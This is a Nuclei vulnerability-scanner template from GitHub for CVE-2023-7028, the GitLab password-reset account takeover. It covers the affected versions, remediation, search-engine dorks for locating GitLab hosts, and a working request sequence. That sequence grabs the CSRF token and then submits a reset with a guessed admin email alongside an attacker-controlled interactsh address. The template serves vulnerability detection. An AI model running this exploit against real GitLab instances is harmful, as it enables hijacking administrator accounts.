nuclei-templates/http/cves/2023/CVE-2023-7028.yaml at main · projectdiscovery/nuclei-templates · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
id: CVE-2023-7028

info:
  name: GitLab - Account Takeover via Password Reset
  author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
  severity: high
  description: |
    An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
  impact: |
    Unauthenticated attackers can send password reset emails to unverified email addresses, enabling account takeover by intercepting the reset link sent to an attacker-controlled email.
  remediation: |
    Upgrade GitLab to version 16.1.6, 16.2.9, 16.3.7, 16.4.5, 16.5.6, 16.6.4, 16.7.2, or later depending on your version.
  reference:
    - https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
    - https://x.com/rwincey/status/1745659710089437368?s=20
    - https://gitlab.com/gitlab-org/gitlab/-/issues/436084
    - https://hackerone.com/reports/2293343
    - https://github.com/V1lu0/CVE-2023-7028
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-7028
    cwe-id: CWE-640,CWE-284
    epss-score: 0.93543
    epss-percentile: 0.99829
    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 6
    vendor: gitlab
    product: gitlab
    shodan-query:
      - title:"Gitlab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev,vkev,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /users/password HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/users/password/new

        authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}

    payloads:
      username:
        - admin@example.com
        - admin@{{RDN}}
        - root@{{RDN}}
        - gitlab@{{RDN}}
        - git@{{RDN}}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'smtp')

    extractors:
      - type: dsl
        dsl:
          - username
# digest: 490a00463044022100f869876bde5002d6c9a4d59722476553a4acb619f84ac3207caeb5631e6dddcc021f0ed5b813b374786bd961009b609ed2c9c7c481a3bf7099afe79b2d64761856:922c64590222798bb761d5b6d8e72950